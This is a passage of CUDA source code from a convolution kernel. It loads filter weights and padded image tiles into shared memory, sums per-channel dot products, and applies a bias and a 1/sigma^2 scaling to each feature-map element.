    int filterIdx = blockIdx.x / (input_size / 32);
    int tx = blockIdx.x % (input_size / 32) * 32 + threadIdx.x;
    int ty = blockIdx.y % (input_size / 32) * 32 + threadIdx.y;

    /* Output address for this thread's feature-map element. */
    float *target = feature_map + imgIdx * feature_map_size * feature_map_size * filter_num + feature_map_size * feature_map_size * filterIdx + ty * feature_map_size + tx;
    float local_target = 0.0f;

    /* Accumulate over input channels. */
    for(int g = 0; g < channel_num; g++){
        /* The first filter_size x filter_size threads load this channel's
           filter weights. */
        if(threadIdx.x < filter_size && threadIdx.y < filter_size){
            shFilter[threadIdx.y][threadIdx.x] = filters[filterIdx * channel_num * filter_size * filter_size + + g * filter_size * filter_size + threadIdx.y * filter_size + threadIdx.x];
        }
        __syncthreads();
        float *img = input + imgIdx * input_size * input_size * channel_num + g * input_size * input_size;
        /* Main 32x32 region of the tile; zero-filled inside the left/upper
           padding band. */
        float *shImgLoad = &shImg[threadIdx.y][threadIdx.x];
        if(tx < lu_padding || ty < lu_padding){
            *shImgLoad = 0;
        }else{
            *shImgLoad = img[(ty-lu_padding) * input_size + (tx-lu_padding)];
        }
        /* Right halo columns (threads with small x load a second element
           shifted by 32). */
        if(threadIdx.x < MAX_FILETER_SIZE-1){
            shImgLoad = &shImg[threadIdx.y][threadIdx.x+32];
            if(ty < lu_padding || (tx+32) >= (input_size+lu_padding)){
                *shImgLoad = 0;
            }else{
                *shImgLoad = img[(ty-lu_padding) * input_size + (tx+32-lu_padding)];
            }
        }
        /* Bottom halo rows, and the bottom-right halo corner. */
        if(threadIdx.y < MAX_FILETER_SIZE-1){
            shImgLoad = &shImg[threadIdx.y+32][threadIdx.x];
            if(tx < lu_padding || (ty+32) >= (input_size+lu_padding)){
                *shImgLoad = 0;
            }else{
                *shImgLoad = img[(ty+32-lu_padding) * input_size + (tx-lu_padding)];
            }
            if(threadIdx.x < MAX_FILETER_SIZE-1){
                shImgLoad = &shImg[threadIdx.y+32][threadIdx.x+32];
                if((ty+32) >= (input_size+lu_padding) || (tx+32) >= (input_size+lu_padding)){
                    *shImgLoad = 0;
                }else{
                    *shImgLoad = img[(ty+32-lu_padding) * input_size + (tx+32-lu_padding)];
                }
            }
        }
        __syncthreads();
        /* filter_size x filter_size dot product against the staged tile;
           imgPtr advances one padded tile row per filter row. */
        float *imgPtr = &shImg[threadIdx.y][threadIdx.x];
        for(int i = 0; i < filter_size; i++){
            for(int j = 0; j < filter_size; j++){
                local_target += imgPtr[j] * shFilter[i][j];
            }
            imgPtr += 32 + MAX_FILETER_SIZE - 1;
        }
        /* Barrier before the next channel overwrites the shared tiles. */
        __syncthreads();
    }
    /* Bias, then scale by 1/sigma^2 using the fast (reduced-precision)
       division intrinsic. */
    local_target += hbias[filterIdx];
    local_target *= __fdividef(1.0f , sigma * sigma);
    *target = local_target;
}